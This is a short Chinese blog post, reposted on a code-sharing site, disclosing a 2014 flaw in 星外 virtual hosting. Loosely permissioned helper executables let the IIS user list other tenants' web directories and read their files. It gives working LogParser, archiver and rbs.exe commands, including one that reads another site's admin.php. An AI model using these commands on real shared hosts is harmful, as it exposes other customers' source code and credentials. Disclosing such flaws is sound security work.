码迷,mamicode.com
首页 > Web开发 > 详细

星外虚拟主机跨web目录文件读取漏洞

时间:2014-09-06 12:13:13      阅读:258      评论:0      收藏:0      [点我收藏+]

标签:style   blog   http   color   os   ar   strong   文件   2014   

星外虚拟主机跨目录读取文件漏洞,需要一定条件。

问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:

c:\windows\7i24IISLOG.exe
c:\windows\7i24IISLOG2.exe
c:\windows\7i24IISLOG3.exe
c:\windows\7i24IISLOG4.exe
c:\windows\7i24tool.exe
c:\windows\rsb.exe

 这些文件貌似是星外处理日志、设置权限的,其中的7i24IISLOG.exe其实就是LogParser,LogParser是一款强大日志分析工具,下面利用它来列web目录:

c:\windows\7i24IISLOG  "select top 100 path from e:\host\*.*" -i:FS -rtp:-1

返回如下:
bubuko.com,布布扣

读取其中一个站的目录信息:

c:\windows\7i24IISLOG  "select top 100 path from e:\host\0233ab\*.*" -i:FS -rtp:-1

 bubuko.com,布布扣

下面读取文件内容:

c:\windows\7i24IISLOG "select text from e:\host\0233ab\web\admin.php" -i:textline -rtp:-1

 bubuko.com,布布扣

7i24IISLOG3.exe能够打包ISO文件,利用它同样的也可以列出目录文件信息:

c:\windows\7i24IISLOG3 e:\host\0233ab\web\ c:\windows\temp\123.rar

 bubuko.com,布布扣

同样的还有rbs.exe

c:\windows\rbs -r -v 024dbjj e:\host\0233ab\web\*.*

bubuko.com,布布扣

 

星外虚拟主机跨web目录文件读取漏洞

标签:style   blog   http   color   os   ar   strong   文件   2014   

原文地址:http://www.cnblogs.com/hookjoy/p/3959290.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!